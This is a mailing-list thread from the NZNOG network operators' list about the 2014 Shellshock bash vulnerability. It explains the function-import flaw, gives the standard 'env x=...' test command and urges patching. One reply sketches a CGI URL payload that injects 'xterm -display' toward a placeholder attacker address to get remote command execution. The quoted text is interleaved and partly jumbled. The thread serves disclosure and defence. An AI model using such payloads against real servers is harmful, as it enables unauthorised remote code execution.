Re: [nznog] Shell Shock - Bash vulnerability - CVE-2014-6271

The fundamental problem is this:

In starting, bash treats ANY environment variable whose value starts with "() {" (i.e. open paren, close paren, space, open curly) as a function to be

As I understand it, the problem is significantly worse than that. It's possible to add shell commands after the closing '}' which subsequently get executed by bash, for example: env x='() { :;}; echo vulnerable' bash -c "echo this is a test" - this really should not do what it actually does. The big risk is in CGI execution under web servers. Apache (and others) automatically add CGI URI arguments as environment variables prior to executing CGI scripts. So if I find a CGI script on your web site, and add "?foo='() { ;;}; xterm -display my.ip.address:0.0'" into the URL then if the site CGI script executes _anything_ through bash, maybe even as innocuous as `date` - then that command in the URL gets executed. (I haven't verified that command yet, but you get the gist). Even if your CGI scripts carefully sanitise and check inputs, there's still a hole there through hidden environment variables that can get executed. -- Kerry On 25/09/2014 14:41, Don Stokes wrote: parsed and imported. For example:

$ export ls='() { echo bwahahaha

$ bash # any invocation of bash, including from system(), or as /bin/sh $ ls bwahahaha

This is the mechanism by which bash's "export -f" (export function) works. (By default, functions are not exported to the environment, which is why you never noticed this before.)

Basically, that functionality has a ridiculous number of

; }' potential gotchas, even if the parsing is properly fixed. The unpatched code just blithely throws the string at the command interpreter, and the patches are just band-aids on top of that.

-- don

On 25/09/14

14:14, Nicholas Lee wrote:

...

Fix may not be complete either:

...

https://bugzilla.redhat.com/show_bug.cgi?id=1141597#c23 [6]

On Thu, Sep 25, 2014 at 11:06 AM, Sebastian Castro wrote:

...

...

On 25/09/14 10:57 am, Dean

Pemberton wrote:

...

...

...

Hi all, This isn't normally a security vuln release list but this one looks pretty bad

A newly discovered vulnerability (CVE-2014-6271) in the Bash command-line interpreter poses a critical security risk to Unix and Linux systems. It allows remote code execution.

NZITF is responding to this remote execution exploit, with a News page that we will be keeping up to date - http://www.nzitf.org.nz/news.html [1] .

There are active scans going on already:

http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html [2]

...

...

We are also reaching out to technical and security

community points of

...

...

contact to raise awareness to the issue and ensure necessary action is taken (hence this email to you). Please note, no patch is yet available for Mac OSX. However, many other

patches are available.

...

...

...

So Patch, Patch, Patch.

...

...

...

Regards, Dea

...

...

...

NZNOG mailing list NZNOG(a)list.waikato.ac.nz

http://list.waikato.ac.nz/mailman/listinfo/nznog [3]

...

--

...

Sebastian Castro Technical Research Manager .nz Registry Services (New Zealand Domain Name Registry Limited) desk: +64 4 495 2337 [4] mobile: +64 21 400535 [5]

...

...

NZNOG mailing list NZNOG(a)list.waikato.ac.nz

http://list.waikato.ac.nz/mailman/listinfo/nznog [3]

...

NZNOG mailing list

NZNOG(a)list.waikato.ac.nz

...

http://list.waikato.ac.nz/mailman/listinfo/nznog [3]

_______________________________________________

NZNOG mailing list

NZNOG(a)list.waikato.ac.nz

http://list.waikato.ac.nz/mailman/listinfo/nznog [3] Links: ------ [1] http://www.nzitf.org.nz/news.html [2] http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html [3] http://list.waikato.ac.nz/mailman/listinfo/nznog [4] tel:%2B64%204%20495%202337 [5] tel:%2B64%2021%20400535 [6] https://bugzilla.redhat.com/show_bug.cgi?id=1141597#c23